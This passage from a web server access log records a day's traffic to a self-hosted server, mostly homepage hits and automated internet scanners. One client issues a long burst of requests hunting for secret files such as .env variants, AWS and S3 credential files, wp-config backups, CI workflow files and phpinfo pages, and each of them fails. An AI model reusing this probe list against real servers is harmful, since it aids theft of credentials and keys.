Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[23/Jan/2026:14:44:27 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:45:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:49:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:52:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:09:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[23/Jan/2026:15:10:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 91.224.92.146] [Length 1033] [Gzip -] "Hello World" "-" +[23/Jan/2026:15:12:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:14:48 +0000] 404 - GET http 91.82.83.208 "/_profiler/phpinfo" [Client 195.178.110.162] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2" "-" +[23/Jan/2026:15:15:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[23/Jan/2026:15:20:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:21:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 178.16.53.82] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:15:25:36 +0000] 200 - GET http fb.profibot.synology.me "/" [Client 64.226.112.59] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:25:36 +0000] 400 - GET http fb.profibot.synology.me "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:30:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 123.0.16.134] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.1" "-" +[23/Jan/2026:15:31:28 +0000] 400 - GET http 91.82.83.208 "/" [Client 85.11.183.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:31:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:32:23 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:15:37:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:39:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:42:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.165.76] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:15:51:47 +0000] 404 - GET http 91.82.83.208 "/.aws/credentials" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:51:50 +0000] 404 - GET http 91.82.83.208 "/.aws/credentials.gpg" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:51:54 +0000] 404 - GET http 91.82.83.208 "/.s3cfg" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:51:57 +0000] 404 - GET http 91.82.83.208 "/.passwd-s3fs" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:00 +0000] 404 - GET http 91.82.83.208 "/s3cmd.ini" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:04 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:07 +0000] 404 - GET http 91.82.83.208 "/.env.backup" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:11 +0000] 404 - GET http 91.82.83.208 "/.env.bak" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:14 +0000] 404 - GET http 91.82.83.208 "/.env.config" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:17 +0000] 404 - GET http 91.82.83.208 "/.env.dev" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:21 +0000] 404 - GET http 91.82.83.208 "/.env.live" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:24 +0000] 404 - GET http 91.82.83.208 "/.env.local" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:27 +0000] 404 - GET http 91.82.83.208 "/.env.old" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:31 +0000] 404 - GET http 91.82.83.208 "/.env.prod" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:34 +0000] 404 - GET http 91.82.83.208 "/.env.production" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:38 +0000] 404 - GET http 91.82.83.208 "/.env.save" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:41 +0000] 404 - GET http 91.82.83.208 "/.env.staging" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:45 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:48 +0000] 404 - GET http 91.82.83.208 "/apps/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:52 +0000] 404 - GET http 91.82.83.208 "/store/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:55 +0000] 404 - GET http 91.82.83.208 "/blog/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:52:58 +0000] 404 - GET http 91.82.83.208 "/new/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:02 +0000] 404 - GET http 91.82.83.208 "/old/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:05 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:09 +0000] 404 - GET http 91.82.83.208 "/public/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:12 +0000] 404 - GET http 91.82.83.208 "/portal/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:15 +0000] 404 - GET http 91.82.83.208 "/application/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:19 +0000] 404 - GET http 91.82.83.208 "/laravel/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:22 +0000] 404 - GET http 91.82.83.208 "/laravel/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:26 +0000] 404 - GET http 91.82.83.208 "/laravel/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:29 +0000] 404 - GET http 91.82.83.208 "/laravel/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:32 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:36 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:39 +0000] 404 - GET http 91.82.83.208 "/core/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:43 +0000] 404 - GET http 91.82.83.208 "/config/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:46 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.bak" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:49 +0000] 404 - GET http 91.82.83.208 "/docker-compose.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:53 +0000] 404 - GET http 91.82.83.208 "/.github/workflows/build.yaml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:56 +0000] 404 - GET http 91.82.83.208 "/.github/workflows/build.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:53:59 +0000] 404 - GET http 91.82.83.208 "/.github/workflows/ci.yaml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:03 +0000] 404 - GET http 91.82.83.208 "/.github/workflows/ci.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:06 +0000] 404 - GET http 91.82.83.208 "/config/settings.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:09 +0000] 404 - GET http 91.82.83.208 "/appsettings.json" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:13 +0000] 404 - GET http 91.82.83.208 "/assets/credentials.json" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:16 +0000] 404 - GET http 91.82.83.208 "/config/production.json" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:54:20 +0000] 400 - GET http 91.82.83.208 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:24 +0000] 400 - GET http 91.82.83.208 "/env.dev.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:27 +0000] 400 - GET http 91.82.83.208 "/env.development.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:31 +0000] 400 - GET http 91.82.83.208 "/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:35 +0000] 400 - GET http 91.82.83.208 "/env.prod.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:39 +0000] 400 - GET http 91.82.83.208 "/env.production.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:54:43 +0000] 400 - GET http 91.82.83.208 "/static/js/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:47 +0000] 400 - GET http 91.82.83.208 "/static/js/bundle.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:50 +0000] 400 - GET http 91.82.83.208 "/static/js/main.chunk.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:54 +0000] 400 - GET http 91.82.83.208 "/environment.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:54:58 +0000] 400 - GET http 91.82.83.208 "/scripts/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:55:02 +0000] 400 - GET http 91.82.83.208 "/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:55:06 +0000] 404 - GET http 91.82.83.208 "/_profiler" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:09 +0000] 404 - GET http 91.82.83.208 "/_profiler/phpinfo" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:12 +0000] 404 - GET http 91.82.83.208 "/_profiler/phpinfo.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:16 +0000] 404 - GET http 91.82.83.208 "/phpinfo.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:19 +0000] 404 - GET http 91.82.83.208 "/info.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:22 +0000] 404 - GET http 91.82.83.208 "/pinfo.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:26 +0000] 404 - GET http 91.82.83.208 "/i.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:29 +0000] 404 - GET http 91.82.83.208 "/web/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:33 +0000] 404 - GET http 91.82.83.208 "/crm/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:36 +0000] 404 - GET http 91.82.83.208 "/local/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:39 +0000] 404 - GET http 91.82.83.208 "/prod/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:43 +0000] 404 - GET http 91.82.83.208 "/vendor/laravel/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:46 +0000] 404 - GET http 91.82.83.208 "/vendor/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:49 +0000] 404 - GET http 91.82.83.208 "/app/config/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:53 +0000] 404 - GET http 91.82.83.208 "/core/app/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:56 +0000] 404 - GET http 91.82.83.208 "/.git/info/exclude" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:55:59 +0000] 404 - GET http 91.82.83.208 "/bitbucket-pipelines.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:03 +0000] 404 - GET http 91.82.83.208 "/.gitlab-ci.yml" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:06 +0000] 404 - GET http 91.82.83.208 "/config/environments/development.rb" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:10 +0000] 404 - GET http 91.82.83.208 "/config/environments/production.rb" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:13 +0000] 404 - GET http 91.82.83.208 "/config/environments/staging.rb" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:16 +0000] 404 - GET http 91.82.83.208 "/wp-content/w3tc-config/master-preview.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:19 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:15:56:20 +0000] 404 - GET http 91.82.83.208 "/wp-content/w3tc-config/master.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:23 +0000] 404 - GET http 91.82.83.208 "/.shared/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:26 +0000] 404 - GET http 91.82.83.208 "/system/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:30 +0000] 404 - GET http 91.82.83.208 "/api/src/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:33 +0000] 404 - GET http 91.82.83.208 "/.env_mail_server" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:37 +0000] 404 - GET http 91.82.83.208 "/project/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:40 +0000] 404 - GET http 91.82.83.208 "/.env.development" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:43 +0000] 404 - GET http 91.82.83.208 "/private/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:47 +0000] 404 - GET http 91.82.83.208 "/user/.env.staging" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:50 +0000] 404 - GET http 91.82.83.208 "/doc/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:53 +0000] 404 - GET http 91.82.83.208 "/.env.stage" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:56:57 +0000] 404 - GET http 91.82.83.208 "/v1/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:00 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:04 +0000] 404 - GET http 91.82.83.208 "/config/filesystems.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:07 +0000] 404 - GET http 91.82.83.208 "/config/mail.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:10 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.orig" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:13 +0000] 404 - GET http 91.82.83.208 "/wp-config.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:17 +0000] 404 - GET http 91.82.83.208 "/index.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:20 +0000] 404 - GET http 91.82.83.208 "/temp.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:23 +0000] 404 - GET http 91.82.83.208 "/config/queue.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:27 +0000] 404 - GET http 91.82.83.208 "/config/services.php" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:30 +0000] 404 - GET http 91.82.83.208 "/info" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 162.142.125.202] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:15:57:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.202] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:15:57:34 +0000] 404 - GET http 91.82.83.208 "/phpinfo.php3" [Client 43.134.85.130] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:15:57:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.202] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:15:57:42 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:15:58:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.202] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:15:58:10 +0000] 404 - GET http 91.82.83.208 "/login" [Client 162.142.125.202] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:16:03:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:07:37 +0000] 404 - GET http 91.82.83.208 "/actuator/health" [Client 20.127.155.221] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:16:10:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:20:00 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:26:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:31:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:36:45 +0000] 400 - GET http 91.82.83.208 "/.env" [Client 104.248.247.114] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[23/Jan/2026:16:36:45 +0000] 400 - GET http 91.82.83.208 "/.git/config" [Client 104.248.247.114] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[23/Jan/2026:16:40:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:16:54:22 +0000] 400 - GET http 91.82.83.208 "/" [Client 66.132.153.122] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:16:54:24 +0000] 400 - - http localhost "-" [Client 66.132.153.122] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:16:54:30 +0000] 400 - GET http 91.82.83.208 "/wiki" [Client 66.132.153.122] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:16:55:38 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 145.220.91.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" "-" +[23/Jan/2026:16:56:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:02:55 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:17:04:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:07:33 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:16:01 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 18.213.106.41] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0" "-" +[23/Jan/2026:17:17:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 